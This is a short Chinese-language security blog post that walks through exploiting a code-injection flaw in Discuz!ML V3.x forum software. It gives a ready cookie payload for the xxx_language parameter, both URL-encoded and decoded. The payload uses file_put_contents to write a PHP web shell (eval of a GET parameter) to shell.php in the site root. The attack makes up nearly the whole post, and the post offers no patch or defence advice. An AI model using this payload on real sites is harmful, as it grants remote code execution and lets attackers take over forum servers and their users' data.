Discuz!ML V3.X 代码注入利用过程-Discuz!ML官网下载:http://discuz.ml/download我下的是官网最新版x3.4。

七彩网络

关注WEB安全、网络安全
首页>> 技术文章 >>Discuz!ML V3.X 代码注入利用过程

Discuz!ML官网下载:http://discuz.ml/download

我下的是官网最新版x3.4。

Image

大约共有60多个页面可以利用,包含论坛主页。

Image

GET一下然后找到cookie里面的xxx_language参数,将xxx_language的值改为exp的内容,然后提交并返回200。

exp:

%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2547%2545%2554%255b%2522ss%2522%255d%29%253b%253f%253e%27%29%29.%27

解码:

'. file_put_contents('shell.php',urldecode('<?php  eval($_GET["ss"]);?>')).'

Image

访问主页后,根目录下会生成一个shell.php文件。

Image

利用成功

Image


×

感谢您的支持,我们会一直保持!

扫码支持
请土豪扫码随意打赏

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

打赏作者
版权所有,转载注意明处:Shun's Blog - 致力于关注黑客技术、网络安全、WEB安全。 » Discuz!ML V3.X 代码注入利用过程
标签: Discuz!MLV3.X代码注入

发表评论

路人甲

网友评论(0)